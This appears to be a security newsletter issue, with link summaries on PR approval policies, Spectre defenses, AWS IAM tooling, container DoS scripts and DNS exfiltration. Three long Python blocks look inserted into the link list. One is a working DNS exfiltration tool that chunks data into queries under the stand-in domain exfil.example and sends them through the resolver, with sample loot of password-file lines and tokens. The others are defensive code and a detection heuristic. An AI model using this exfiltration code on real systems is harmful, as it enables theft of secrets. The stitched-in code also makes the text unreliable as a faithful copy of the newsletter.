[tl;dr sec] #75 - IAM Least Privilege at Speed, Spectre, and How to Beat a Grandmaster at Chess
How Netflix enables development velocity + security with ConsoleMe, Spectre PoC and proposed defenses, and why speed is a superpower.
I hope you’ve been doing well!
DevSecCon announced the winners:
A big congrats to all these great people doing great work, keep it up! 🙌
With (Mediocre) Power Comes…
One fun thing about tl;dr sec is that periodically people share neat articles with me that I wouldn’t have otherwise seen, or share tools that haven’t been publicly released yet.
Like endgame, if you saw that kerfuffle. And there’s another tool in the works that I think will also cause a bit of splash. Keep an eye out 😎
Another thing I realized is that tl;dr sec in the wrong hands could be used to spoil the twist in some movie or TV show for a pretty decent number of people.
I’m not the type to do that, but it was a random shower thought I had.
📢 Use SpiderFoot HX for broader attack surface visibility
An attack surface is made up of more than open ports and hostnames; you need a full spectrum of OSINT. If you already know this, then you've probably hit the next hurdle: automating collection and correlation of all that data. That's where SpiderFoot HX comes in. Built on top of the popular open source version, it automates your OSINT collection and gives you the tools to find the critical needle in the stack of needles. It's also cloud-hosted, so always online and ready to go. As a tl;dr sec subscriber, you'll receive a 10% discount on any annual subscription by using the coupon TLDRSEC.
One of the cool things about SpiderFoot is that it started as (and still is) an open source project by Steve Micallef and team. I’m a fan of open source projects with a commercial version with enterprise-y features.
That way, businesses can get their problems solved, the open source version can be actively supported, and the maintainers can earn a good living. Check it out!
📜 In this newsletter...
AppSec: GitHub App to up your PR approval policy game, overview of a lightweight threat modeling approach
Web Security: Middleware misconfigurations and potential exploits
Spectre: Spectre demo in your browser, RFC on protecting against it, Chrome extension to find potentially vulnerable resources
Cloud Security: Tool to balance IAM least privilege + development velocity, manage GCP secrets in your IDE, hackingthe.cloud, when to use Amazon Cognito
Container Security: OWASP Docker security cheat sheet, PoC scripts to demonstrate Kubernetes DoS conditions
Red Team: Bash script that automates data exfiltration over DNS
Politics / Privacy: T-Mobile is selling your data by default now. Shame!
Beating a grandmaster at chess: Moving quickly is a superpower
A GitHub App for enforcing approval policies on pull requests that goes beyond what GitHub natively supports, including:
Require reviews from specific users, organizations, or teams
Apply rules based on the files, authors, or branches involved in a pull request
Combine multiple approval rules with "and" and "or" conditions
Automatically approve pull requests that meet specific conditions
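To make the four capabilities above concrete, here is an added example (Python, written for this newsletter, not code from the GitHub App being described) of a small approval-policy evaluator: rules keyed on paths, authors and branches, team-scoped reviewer requirements, and/or combinators, and an auto-approve rule. The team membership, rule names and pull-request fields are constructed for the example; a real app would read them from GitHub.

```python
# Added example (Python), not code from the GitHub App the newsletter links:
# a small evaluator for pull-request approval policies of the kind listed
# above. Team membership, rule names and the PR fields are constructed.
from dataclasses import dataclass, field
from fnmatch import fnmatch
from typing import List, Optional, Set, Tuple, Union


@dataclass
class PullRequest:
    author: str
    branch: str
    files: List[str]
    approvals: Set[str]  # logins of reviewers who approved


# Hypothetical team membership; the real app would read it from GitHub.
TEAMS = {"security": {"alice", "bob"}, "platform": {"carol", "dave"}}


@dataclass
class Rule:
    """Require approvals when a PR matches the branch/author/path patterns."""
    name: str
    paths: List[str] = field(default_factory=lambda: ["*"])
    branches: List[str] = field(default_factory=lambda: ["*"])
    authors: List[str] = field(default_factory=lambda: ["*"])
    require_team: Optional[str] = None  # None: any reviewer counts
    require_count: int = 1

    def applies(self, pr: PullRequest) -> bool:
        # fnmatch's "*" also matches "/", so "*.tf" matches files in any directory.
        return (any(fnmatch(pr.branch, p) for p in self.branches)
                and any(fnmatch(pr.author, p) for p in self.authors)
                and any(fnmatch(f, p) for f in pr.files for p in self.paths))

    def satisfied(self, pr: PullRequest) -> bool:
        if not self.applies(pr):
            return True  # the rule is not triggered by this PR
        eligible = TEAMS[self.require_team] if self.require_team else pr.approvals
        # Never let the author's own approval count toward the requirement.
        approvers = (set(eligible) & pr.approvals) - {pr.author}
        return len(approvers) >= self.require_count


@dataclass
class AutoApprove:
    """Approve without review, but only if *every* changed file matches."""
    name: str
    paths: List[str]
    authors: List[str]

    def satisfied(self, pr: PullRequest) -> bool:
        return (any(fnmatch(pr.author, p) for p in self.authors)
                and bool(pr.files)
                and all(any(fnmatch(f, p) for p in self.paths) for f in pr.files))


Policy = Union[Rule, AutoApprove, Tuple[str, list]]


def evaluate(policy: Policy, pr: PullRequest) -> bool:
    """Walk the policy tree: ("and", [...]) / ("or", [...]) combine leaf rules."""
    if isinstance(policy, tuple):
        op, children = policy
        combine = all if op == "and" else any
        return combine(evaluate(child, pr) for child in children)
    return policy.satisfied(pr)


POLICY: Policy = ("or", [
    # Dependency bumps from the bot skip review, unless they touch anything else.
    AutoApprove("dependabot", paths=["requirements*.txt"], authors=["dependabot"]),
    ("and", [
        Rule("baseline"),  # every change: one non-author approval
        Rule("iam-changes", paths=["infra/iam/*", "*.tf"], require_team="security"),
        Rule("release-branches", branches=["release/*"],
             require_team="platform", require_count=2),
    ]),
])


def decide(pr: PullRequest) -> bool:
    """True if the PR satisfies POLICY and may be merged."""
    return evaluate(POLICY, pr)
```

Two details matter for security: the author's own approval is never counted, and the auto-approve rule requires every changed file to match, so a bot PR cannot carry an unrelated change through unreviewed.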
Rapid Risk Assessments (RRA): a lightweight approach to measuring risks and modeling threats
~30min video by Julien Vehent in which he describes rapid risk assessments, a lightweight threat modeling approach that I think is quite practical and useful. (Mozilla docs).
Middleware, middleware everywhere and lots of misconfigurations to fix
Detectify’s Frans Rosén, Mathias Karlsson, and Fredrik Almroth describe some interesting middleware misconfigurations and potential exploits that, if left unchecked, leave your web applications vulnerable to attack. See also, common Nginx misconfigurations.
🔥 Spectre Demo
Post-Spectre Web Development
W3C RFC by Google’s Mike West et al that does a nice job of laying out the threat model and concrete mitigations in different scenarios. Sidenote: if you’re interested in modern web and browser security features, this RFC references a number of useful topics and resources.
Chrome extension by Lukas Weichselbaum et al that “identifies resources which are exempt from default protections enabled in Google Chrome (Cross-Origin Read Blocking, SameSite cookies) and which can be embedded cross-site. The results are added to Chrome’s DevTools “Spectroscope” panel and include security recommendations to help protect your resources from Spectre and other cross-site attacks.”
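The RFC's mitigations for a site that never intends to be embedded cross-site boil down to two moves: reject cross-site subresource requests on the server using the Fetch Metadata request headers, and send response headers (Cross-Origin-Resource-Policy, Cross-Origin-Opener-Policy, nosniff, SameSite cookies) that keep the data out of a cross-site renderer process. The following is an added example (Python, written for this newsletter; not code from the RFC, from Chrome, or from the Spectroscope extension) that implements both as a WSGI middleware. The header names are the standard ones; the WSGI wiring and the sample requests are constructed.

```python
# Added example (Python), not code from the RFC or from Chrome: a server-side
# "resource isolation" check built on the Sec-Fetch-* request headers, plus the
# response headers that keep a resource out of cross-site renderer processes.
# Header names are the standard ones; the WSGI wiring is constructed here.
from typing import Dict, List, Optional, Tuple

NAVIGATION_DESTS_TO_BLOCK = ("object", "embed")  # plugin-style cross-site embeds


def is_request_allowed(method: str, headers: Dict[str, Optional[str]]) -> bool:
    """True if the request may be served; False means answer 403."""
    h = {k.lower(): v for k, v in headers.items() if v is not None}
    site = h.get("sec-fetch-site")
    # Browsers that do not send Fetch Metadata get no protection from this
    # check; we allow them rather than break them (the RFC's main caveat).
    if site is None:
        return True
    # Same-origin, same-site and user-initiated requests (address bar,
    # bookmark) are not cross-site attacks.
    if site in ("same-origin", "same-site", "none"):
        return True
    # Cross-site: permit only a plain top-level GET navigation (a link into
    # the site), never subresource loads or <object>/<embed> navigations.
    return (h.get("sec-fetch-mode") == "navigate"
            and method.upper() == "GET"
            and h.get("sec-fetch-dest") not in NAVIGATION_DESTS_TO_BLOCK)


def isolation_headers(cross_origin_isolate: bool = False) -> List[Tuple[str, str]]:
    """Headers to add to every response of a site that is never embedded cross-site."""
    hdrs = [
        # CORP keeps the body out of a cross-site renderer even when CORB
        # cannot classify it (e.g. an unusual Content-Type).
        ("Cross-Origin-Resource-Policy", "same-site"),
        # COOP puts the document in its own browsing context group, severing
        # window.opener references from cross-origin pages.
        ("Cross-Origin-Opener-Policy", "same-origin"),
        # nosniff lets CORB act on the declared Content-Type without sniffing.
        ("X-Content-Type-Options", "nosniff"),
        # The answer depends on the request's Fetch Metadata, so a cache must
        # not hand a same-site answer to a cross-site request.
        ("Vary", "Sec-Fetch-Site, Sec-Fetch-Mode, Sec-Fetch-Dest"),
    ]
    if cross_origin_isolate:
        # Needed (with COOP) for SharedArrayBuffer; breaks cross-origin
        # subresources that do not themselves send CORP or CORS headers.
        hdrs.append(("Cross-Origin-Embedder-Policy", "require-corp"))
    return hdrs


def session_cookie(name: str, value: str) -> str:
    """Set-Cookie value: SameSite=Lax keeps the cookie off cross-site subresource loads."""
    return f"{name}={value}; Secure; HttpOnly; SameSite=Lax; Path=/"


def resource_isolation(app):
    """WSGI middleware applying the check and the headers to an existing app."""
    def wrapped(environ, start_response):
        headers = {
            "Sec-Fetch-Site": environ.get("HTTP_SEC_FETCH_SITE"),
            "Sec-Fetch-Mode": environ.get("HTTP_SEC_FETCH_MODE"),
            "Sec-Fetch-Dest": environ.get("HTTP_SEC_FETCH_DEST"),
        }
        if not is_request_allowed(environ.get("REQUEST_METHOD", "GET"), headers):
            start_response("403 Forbidden",
                           [("Content-Type", "text/plain")] + isolation_headers())
            return [b"cross-site request blocked\n"]

        def start_with_isolation(status, response_headers, exc_info=None):
            return start_response(status,
                                  list(response_headers) + isolation_headers(),
                                  exc_info)
        return app(environ, start_with_isolation)
    return wrapped
```

The check rejects cross-site `<img>`, `<script>`, `fetch()` and `<object>` loads while still letting a user click a link into the site. Resources that are legitimately consumed cross-site (a public API with CORS, embeddable widgets) need an allowlist in front of this check and a CORP value of `cross-origin` instead of `same-site`.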
Introducing Cloud Code Secret Manager Integration
You can now create and manage secrets stored in GCP’s Secret Manager right from your IDE (VS Code, IntelliJ, Cloud Shell Editor). Wow, this is some A+ developer UX work, well done.
hackingthe.cloud
“An encyclopedia of attacks/tactics/techniques that offensive security professionals can use on their next cloud exploitation adventure,” by Nick Frichette. Currently covers general knowledge, enumeration, exploitation, avoiding detection, and post exploitation for AWS.
When to use Amazon Cognito
Pros: Very cost effective and plays nicely with AWS services.
Cons: Poorly documented and some of its features feel undercooked.
🔥 ConsoleMe: A Central Control Plane for AWS Permissions and Access
This is like the security engineering equivalent of a fancy schmancy wine you’d swirl around in your glass to make sure it’s properly aerated before enjoying (“Mmm, hints of least privilege with notes of cloud-native.”).
Super cool work by the Netflix cloud security team, including Curtis Castrapel, Patrick Sanders, and Hee Won Kim, on how Netflix balances IAM least privilege with development velocity. Snape kills Dumbledore. Travis McPeak and Will Bengston discussed ConsoleMe in their AppSec Cali 2019 talk (summary), and what I love about it is it improves security and developer productivity.
Highly recommended reading as inspiration for your internal security engineering efforts.
OWASP Cheat Sheet Series: Docker Security
11 rules to follow, a list of static analysis tools, and a number of useful reference articles.
uchi-mata/dostainer
By Matthias Luft: Three scripts to demonstrate resource exhaustion from within a Kubernetes cluster, including allocating all remaining RAM, allocating all remaining disk space, and fork bombing.
By @_vepe: A bash script that automates the exfiltration of data over DNS. Useful when you have a blind command execution on a server where all outbound connections except DNS are blocked.
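To show what "exfiltration over DNS" actually involves on the wire, here is an added example written for this newsletter (in Python rather than bash, and not the linked script): the sending side that chunks data into DNS query names within the RFC 1035 label and name limits, the receiving side that reassembles them from a name server's query log, and the detection heuristic a defender would run over the same log. `exfil.example` is a placeholder domain and the "loot" is constructed; nothing is resolved unless `send_queries()` is called, so the code runs offline.

```python
# Added example (Python rather than the bash script the newsletter links):
# the sending side of DNS exfiltration, the receiving side that reassembles
# the queries, and a detection heuristic for the resulting query names.
# exfil.example is a placeholder domain; nothing is resolved unless
# send_queries() is called, so the code runs offline.
import base64
import math
import socket
import zlib
from typing import Dict, List, Optional

MAX_LABEL = 63   # RFC 1035 per-label limit
MAX_NAME = 253   # RFC 1035 limit for the whole name


def encode_queries(data: bytes, domain: str, session: str = "s1") -> List[str]:
    """Turn data into query names "<seq>.<session>.<chunk labels>.<domain>".

    Base32 (not base64) because resolvers may change the case of a name and
    labels may only contain [A-Za-z0-9-]; compressing first cuts the query count.
    """
    payload = base64.b32encode(zlib.compress(data)).decode().rstrip("=").lower()
    # Conservative room for payload labels after seq, session and domain.
    budget = MAX_NAME - len(domain) - len(session) - 8
    per_query = (budget // (MAX_LABEL + 1)) * MAX_LABEL
    if per_query <= 0:
        raise ValueError("domain/session too long for any payload")
    pieces = [payload[i:i + per_query] for i in range(0, len(payload), per_query)]
    names = []
    for seq, piece in enumerate(pieces):
        labels = [piece[j:j + MAX_LABEL] for j in range(0, len(piece), MAX_LABEL)]
        names.append(".".join([str(seq), session, *labels, domain]))
    # Terminator carries the chunk count so the receiver knows when it is done.
    names.append(".".join([f"end{len(pieces)}", session, domain]))
    return names


def decode_queries(names: List[str], domain: str, session: str = "s1") -> bytes:
    """Receiver side: reassemble from logged query names (any order, duplicates ok)."""
    suffix = domain.count(".") + 1
    chunks: Dict[int, str] = {}
    total: Optional[int] = None
    for name in names:
        labels = name.rstrip(".").split(".")
        if len(labels) < 2 + suffix or labels[1] != session:
            continue  # unrelated query, or a different session
        if labels[-suffix:] != domain.split("."):
            continue
        head, body = labels[0], labels[2:len(labels) - suffix]
        if head.startswith("end"):
            total = int(head[3:])
        elif head.isdigit():
            chunks[int(head)] = "".join(body)
    if total is None or any(i not in chunks for i in range(total)):
        raise ValueError("incomplete transfer")
    payload = "".join(chunks[i] for i in range(total)).upper()
    payload += "=" * (-len(payload) % 8)  # restore base32 padding
    return zlib.decompress(base64.b32decode(payload))


def send_queries(names: List[str]) -> int:
    """Fire the queries through the host's resolver. NXDOMAIN is expected: the
    authoritative server for the domain has logged the name by then."""
    for name in names:
        try:
            socket.getaddrinfo(name, None)
        except socket.gaierror:
            pass
    return len(names)


def looks_like_exfil(qname: str, min_label: int = 30, min_entropy: float = 3.5) -> bool:
    """Flag a query name whose longest label is long and high-entropy.

    Noisy on its own (CDN and tracking hostnames trip it too); pair it with
    counts of unique subdomains per domain and query volume per client.
    """
    longest = max(qname.rstrip(".").split("."), key=len)
    n = len(longest)
    if n < min_label:
        return False
    entropy = -sum((c / n) * math.log2(c / n)
                   for c in (longest.count(ch) for ch in set(longest)))
    return entropy >= min_entropy


# Constructed sample "loot"; a real script would read a file or command output.
SAMPLE = b"\n".join([
    b"root:x:0:0:root:/root:/bin/bash",
    b"deploy:x:1001:1001::/home/deploy:/bin/bash",
    b"DB_PASSWORD=hunter2",
    b"API_TOKEN=constructed-example-token-0123456789",
])
DOMAIN = "exfil.example"
```

Note what makes this work in the blind-execution scenario the tool targets: the victim never needs a direct connection to the attacker, only a resolver that forwards unknown names upstream, and the data lives entirely in the query name, so it arrives even when every answer is NXDOMAIN. The same property is what the detector keys on: no benign application generates many distinct, long, near-random labels under one domain.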
Politics / Privacy
T-Mobile to Step Up Ad Targeting of Cellphone Customers
So frustrating 🤬 “T-Mobile will automatically enroll its phone subscribers in an advertising program informed by their online activity, testing businesses’ appetite for information that other companies have restricted.” Thankfully Drew FitzGerald shares some opt-out info. H/T Zack Whittaker.
From ConvertKit founder Nathan Barry’s newsletter:
✉️ Wrapping Up
Have questions, comments, or feedback? Just reply directly, I'd love to hear from you.
If you find this newsletter useful and know other people who would too, I'd really appreciate if you'd forward it to them 🙏
Thanks for reading!